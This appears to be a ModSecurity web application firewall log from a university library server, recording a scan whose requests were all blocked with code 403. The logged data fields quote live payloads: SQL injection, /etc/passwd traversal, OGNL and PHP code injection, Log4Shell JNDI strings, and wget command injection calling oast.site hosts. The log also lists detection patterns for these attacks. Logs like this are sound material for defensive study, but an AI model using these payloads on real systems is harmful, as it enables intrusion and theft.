[Tue Aug 29 11:30:11.436658 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAAN5YEcAAAAN"]
[Tue Aug 29 11:30:11.563718 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAPDnt0AAAAP"]
[Tue Aug 29 11:30:12.599257 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10VMCo-f0AAAPQkdYAAAAe"]
[Tue Aug 29 11:30:12.719110 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPS5vAAAAAh"]
[Tue Aug 29 11:30:13.396915 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAOM4T8AAAAU"]
[Tue Aug 29 11:30:14.426753 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAPRNXUAAAAf"]
[Tue Aug 29 11:30:15.371714 2023] [:error] [pid 960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPAex4AAAAL"]
[Tue Aug 29 11:30:15.390874 2023] [:error] [pid 960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPAex8AAAAL"]
[Tue Aug 29 11:30:16.316709 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgtj1t4at66uw1f.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgtj1t4at66uw1f.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgtj1t4at66uw1f.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPDnvMAAAAP"]
[Tue Aug 29 11:30:17.583433 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAO873MAAAAF"]
[Tue Aug 29 11:30:19.493122 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAANh1pYAAAAA"]
[Tue Aug 29 11:30:20.475613 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAO873wAAAAF"]
[Tue Aug 29 11:30:22.311705 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAAOOuTYAAAAW"]
[Tue Aug 29 11:30:22.609234 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgbgxts6m9estoh.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAOGafQAAAAS"]
[Tue Aug 29 11:30:23.340185 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAOOuTkAAAAW"]
[Tue Aug 29 11:30:23.352422 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAOM4VcAAAAU"]
[Tue Aug 29 11:30:24.332432 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPOhYEAAAAa"]
[Tue Aug 29 11:30:24.358616 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOGafcAAAAS"]
[Tue Aug 29 11:30:25.507641 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgc3ago14z4ds8h.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOKNm4AAAAK"]
[Tue Aug 29 11:30:25.598917 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPPSuwAAAAd"]
[Tue Aug 29 11:30:26.309567 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAPENccAAAAQ"]
[Tue Aug 29 11:30:28.419076 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAPNBSEAAAAZ"]
[Tue Aug 29 11:30:28.429001 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAPNBSEAAAAZ"]
[Tue Aug 29 11:30:29.331239 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAPMl-wAAAAY"]
[Tue Aug 29 11:30:30.349232 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZsCo-f0AAANjpyUAAAAT"]
[Tue Aug 29 11:30:30.441473 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPiBfcAAAAB"]
[Tue Aug 29 11:30:31.363233 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10Z8Co-f0AAAPPSv0AAAAd"]
[Tue Aug 29 11:30:32.704881 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPmhLwAAAAV"]
[Tue Aug 29 11:30:33.623875 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPDnxkAAAAP"]
[Tue Aug 29 11:30:34.319744 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPXAmUAAAAi"]
[Tue Aug 29 11:30:34.325436 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPXAmUAAAAi"]
[Tue Aug 29 11:30:34.360233 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg5s8hsnm74u8h3.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAANjpy4AAAAT"]
